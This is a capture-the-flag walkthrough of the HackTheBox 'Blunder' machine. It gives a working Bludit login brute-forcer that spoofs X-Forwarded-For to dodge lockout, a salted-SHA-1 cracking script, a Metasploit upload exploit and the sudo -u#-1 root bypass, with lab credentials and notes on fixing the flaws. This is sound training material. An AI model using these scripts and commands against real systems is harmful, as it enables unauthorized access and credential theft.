HTB Blunder — Walkthrough

Blunder is an Easy box.

Tools

  • Nmap
  • Dirsearch
  • cewl
  • Metasploit

Note: for ease of use, I just added the IP address of the machine to my hosts file.

Scanning

As usual, the first step in solving any machine is scanning. Scanning can be done with many tools, but Nmap is the beloved one.

Command:

nmap -Pn -sC -sV -v -T5  -oA Nmap/blunder blun

It seems that we have a web application running on port 80.

Enumeration

As found in the scanning results, port 80 is open, so let's check the running web application.

After going through the HTML source code of the web application, it seems there is nothing interesting, and there is no interesting JavaScript file either.

Moving to the next step: directory brute-forcing, to check whether there is any interesting directory or file.

I will use the Dirsearch tool for that purpose.

command:

python3.7 dirsearch.py -t 100  --http-method=HEAD  -e php -w /usr/share/wordlists/dirb/common.txt -u http://blunder.htb/

the above command uses:

  • -t 100 for using 100 threads
  • --http-method=HEAD to use the HEAD HTTP method, so responses come back faster
  • -e php to append the .php extension to the wordlist entries
  • -w /usr/share/wordlists/dirb/common.txt as the wordlist
  • -u http://blunder.htb/ as the target URL

python3.7 dirsearch.py -h

To save time, I only did it for PHP-extensioned pages. All I found was the /admin page, which is the admin login.

From the login page we can tell that the running application is BLUDIT, which is a CMS.

A little Google search on security issues related to that CMS turned up a way to bypass the brute-force mitigation used by the software.

This is because the CMS trusts the X-Forwarded-For HTTP header when identifying the client: failed logins are counted per address taken from that header, so an attacker can keep brute-forcing without being blocked by sending a different fake value for that header on every request.

Bludit Brute Force Mitigation Bypass
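To make the bypass concrete, here is an added example (not Bludit's code and not from the original post) that models a per-address login lockout in two variants: one that resolves the client address from X-Forwarded-For the way the page describes, and a hardened one that only honours the header when the TCP peer is a known reverse proxy. The limiter, its threshold and window, the attacker address 10.10.14.5 and the word list are all constructed for the demo; they are not Bludit's real values.

```python
"""Why spoofing X-Forwarded-For defeats a per-IP login lockout.

Added example, not Bludit's code. LoginLimiter is a simplified model of
the behaviour the page describes (count failed logins per client address,
block that address once the count hits a limit); MAX_FAILURES and
BLOCK_SECONDS are assumed values, not Bludit's real ones. The attacker
address 10.10.14.5 and the word list are constructed for the demo.
"""
import time
from collections import defaultdict

MAX_FAILURES = 10     # assumption for the demo
BLOCK_SECONDS = 300   # assumption for the demo


def client_ip_trusting_xff(remote_addr, headers):
    """Vulnerable: prefer X-Forwarded-For whenever the header is present.

    A client talking directly to the server sets this header itself, so
    each request can claim to come from a brand-new address."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr, headers, trusted_proxies=frozenset()):
    """Hardened: honour X-Forwarded-For only when the TCP peer is one of
    our own reverse proxies, and then take the address that proxy appended
    (the rightmost one); anything further left may be forged by the client."""
    xff = headers.get("X-Forwarded-For")
    if xff and remote_addr in trusted_proxies:
        return xff.split(",")[-1].strip()
    return remote_addr


class LoginLimiter:
    """Per-address failed-login counter with a time window."""

    def __init__(self, ip_resolver, now=time.time):
        self.ip_resolver = ip_resolver
        self.now = now
        self.failures = defaultdict(list)  # address -> failure timestamps

    def is_blocked(self, ip):
        cutoff = self.now() - BLOCK_SECONDS
        self.failures[ip] = [t for t in self.failures[ip] if t > cutoff]
        return len(self.failures[ip]) >= MAX_FAILURES

    def attempt(self, remote_addr, headers, password, real_password):
        """Returns 'blocked', 'success' or 'fail' for one login request."""
        ip = self.ip_resolver(remote_addr, headers)
        if self.is_blocked(ip):
            return "blocked"
        if password == real_password:
            return "success"
        self.failures[ip].append(self.now())
        return "fail"


def run_bruteforce(limiter, wordlist, real_password, spoof_xff):
    """One attacker address tries each candidate once. With spoof_xff the
    request carries a different X-Forwarded-For value each time (the PoC
    simply sends the candidate password as the header value)."""
    results = []
    for word in wordlist:
        headers = {"X-Forwarded-For": word} if spoof_xff else {}
        results.append(limiter.attempt("10.10.14.5", headers, word, real_password))
        if results[-1] == "success":
            break
    return results


def demo(wordlist, real_password):
    """Final outcome of the same spoofed brute force against both resolvers."""
    vulnerable = LoginLimiter(client_ip_trusting_xff)
    hardened = LoginLimiter(client_ip_hardened)
    return (run_bruteforce(vulnerable, wordlist, real_password, True)[-1],
            run_bruteforce(hardened, wordlist, real_password, True)[-1])


if __name__ == "__main__":
    words = ["candidate%d" % i for i in range(30)] + ["RolandDeschain"]
    print("trusting X-Forwarded-For: %s, hardened: %s" % demo(words, "RolandDeschain"))
```

Against the vulnerable resolver every request lands on a fresh counter and the correct password is eventually accepted; against the hardened one the attacker's real peer address is blocked after MAX_FAILURES attempts and every later attempt, including the correct password, is rejected. The fix is the resolver, not the counter: never derive the rate-limit key from a header the client controls.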

There is a PoC Python script to test this vulnerability, but it requires two inputs:

  1. username (by default admin)
  2. a password wordlist (the PoC generates its own list inside the script)

I tried it as it is, but it did not work, so I had to find a way to get usernames and also build a custom wordlist.

Next step is user enumeration, so I tried to find any other file types which may leak some info. I tried many extensions until I found an interesting txt file.

command:

python3.7 dirsearch.py  --http-method=HEAD  -e txt -w /usr/share/wordlists/dirb/big.txt -u http://blunder.htb/

the above command uses:

  • --http-method=HEAD to use the HEAD HTTP method for the web requests, so the results come back faster
  • -e txt to look for .txt files
  • -w /usr/share/wordlists/dirb/big.txt as a larger wordlist

We can find a username inside the found txt file.

User Flag

Now, let's move to the attacking phase by trying to brute-force the password of the fergus user.

I used the cewl tool to create a custom wordlist from all the words on the web application itself.

command:

cewl -w blunderWordlist.txt http://blunder.htb

So I created a custom wordlist to be used in the brute-force attack with the Python script found online.

I just made a few changes to the script to set the username to fergus and use the generated wordlist.

Below is the modified script; I modified the values of these variables:

  • host
  • username
  • wordlist

and also changed the wordlist to be read from a file instead of being generated inside the script, in addition to the way the current trial values are displayed.

#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist_filename = "Wordlists/blunderWordlist.txt"

# Read the cewl-generated wordlist, one candidate per line, skipping blank lines
with open(wordlist_filename, 'r') as f:
    wordlist = [w for w in f.read().split('\n') if w]
print('Working on Wordlist: {w} , with word count {c}'.format(w = wordlist_filename, c = len(wordlist)))

counter = 0
for password in wordlist:
    counter += 1
    session = requests.Session()
    # Each attempt needs a fresh CSRF token from the login page
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[{c}] Trying: {u}:{p}'.format(c = counter, u = username, p = password))

    # The bypass: Bludit keys its failed-login counter on X-Forwarded-For,
    # so a different value on every request keeps the counter from ever reaching the limit
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login answers with a redirect to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

Run the script

command:

python3.7 bruteForcer.py

So the password for fergus is RolandDeschain.

Now, let's use the above credentials to gain access to the admin page.

The found credentials worked.

After more searching about the BLUDIT CMS, I found that there is a public exploit for the image upload function, and also a Metasploit module for it.

Bludit — Directory Traversal Image File Upload (Metasploit)

Let’s run Metasploit

msfconsole

Now, let's search for BLUDIT.

It requires 3 items:

  1. BLUDITUSER : Username
  2. BLUDITPASS : Password
  3. RHOSTS : Target host

Now we have a Meterpreter session.

Now let's get a shell on the machine.

Now let's list the users on the system who have a login shell.

So there are some users:

  1. root
  2. hugo

I found that the user hugo has the user.txt file.

I cannot read this file with the current www-data privileges, so I had to enumerate more to find another way.

After reading more about this CMS, I found that it stores the user details in a file called users.php in the databases directory (bl-content/databases/users.php).

I downloaded the file and checked its contents.

After reading more about it, I found that it stores the SHA-1 hash of the password concatenated with a per-user salt. I could not crack the admin password, but I found another way to reset the admin password through a PHP script called recovery.php.

Bludit Password Recovery Tool

and I could get admin privileges on the web app, but that was not useful for reading user.txt.

I tried to enumerate more inside the box itself until I found a directory called bludit-3.10.0a, which is another version of that CMS.

I thought its users.php file might also contain credentials, so I read it.

This time I found a SHA-1 hash for the hugo user, but the surprise is that it was unsalted, so I tried to look it up with one of the online hash lookup tools.

MD5Hashing.net

So the password for the hugo user is Password120.
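The difference between the two users.php files is worth seeing in code. Bludit stores each password as sha1(password . salt), so a salted entry has to be attacked per user with a wordlist (the cewl list from earlier is the natural input), while an unsalted entry is a bare sha1(password) that any precomputed lookup table answers instantly. The following is an added example, not Bludit's code and not from the original post: it parses a users.php-style file (the PHP guard line followed by JSON) and checks every entry against a wordlist. The users.php content, salts, admin password and wordlist are constructed for the demo and the hashes are generated from those constructed values; they are not the hashes from the box.

```python
"""Offline check of Bludit users.php password hashes against a wordlist.

Added example, not Bludit's own code. Bludit stores each user's password as
sha1(password . salt) in bl-content/databases/users.php, a JSON object
behind a PHP guard line. The fixture below is constructed for this example:
its hashes are computed from the passwords shown in make_fixture(), they are
not the hashes from the box.
"""
import hashlib
import json
import re

# Matches the "<?php defined('BLUDIT') or die(...); ?>" line at the top of the file
PHP_GUARD = re.compile(r"^<\?php.*?\?>\s*", re.S)


def bludit_hash(password, salt=""):
    """sha1(password . salt); an empty salt degenerates to bare sha1(password)."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


def parse_users_php(text):
    """Strip the PHP guard and parse the remaining JSON into {user: record}."""
    return json.loads(PHP_GUARD.sub("", text, count=1))


def crack_users(users, wordlist):
    """Return {username: password} for every entry whose hash is matched.

    A missing or empty salt means the stored value is a plain sha1(password),
    which is exactly the case an online lookup table resolves on sight."""
    found = {}
    for name, rec in users.items():
        salt = rec.get("salt") or ""
        target = (rec.get("password") or "").lower()
        for word in wordlist:
            if bludit_hash(word, salt) == target:
                found[name] = word
                break
    return found


def make_fixture():
    """Constructed users.php content (not the file from the box)."""
    users = {
        "admin": {"nickname": "Admin", "role": "admin",
                  "password": bludit_hash("s0me-l0ng-adm1n-pw", "5dde2887e8aba"),
                  "salt": "5dde2887e8aba"},
        "fergus": {"nickname": "fergus", "role": "author",
                   "password": bludit_hash("RolandDeschain", "c1d2e3f4a5b6c"),
                   "salt": "c1d2e3f4a5b6c"},
        "hugo": {"nickname": "Hugo", "role": "author",
                 "password": bludit_hash("Password120"), "salt": ""},
    }
    return "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps(users, indent=2)


def demo():
    """Crack the fixture with a small constructed wordlist."""
    users = parse_users_php(make_fixture())
    wordlist = ["password", "blunder", "Password120", "RolandDeschain"]
    return crack_users(users, wordlist)


if __name__ == "__main__":
    for user, pw in demo().items():
        print("%s:%s" % (user, pw))
```

Only fergus and hugo are recovered; the admin entry survives because its password is not in the list, which is the same situation the post hit before falling back to recovery.php. To use this against a real file, replace make_fixture() with the downloaded users.php and the inline wordlist with the cewl output, one candidate per line.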

Now let's switch to the hugo user.

Now let's read the user.txt.

Root flag

Now it is time for privilege escalation.

The first thing that came to mind is to check for sudo issues, so let's check the user's sudo permissions.

command:

sudo -l

So the exploit to run /bin/bash as root is as follows:

sudo -u#-1 /bin/bash

This works because the sudoers entry allows hugo to run /bin/bash as any user except root ((ALL, !root)), and sudo versions before 1.8.28 resolve the user ID -1 (and its unsigned form 4294967295) to 0, i.e. root, so the !root restriction is bypassed (CVE-2019-14287).

Now we can read the root.txt
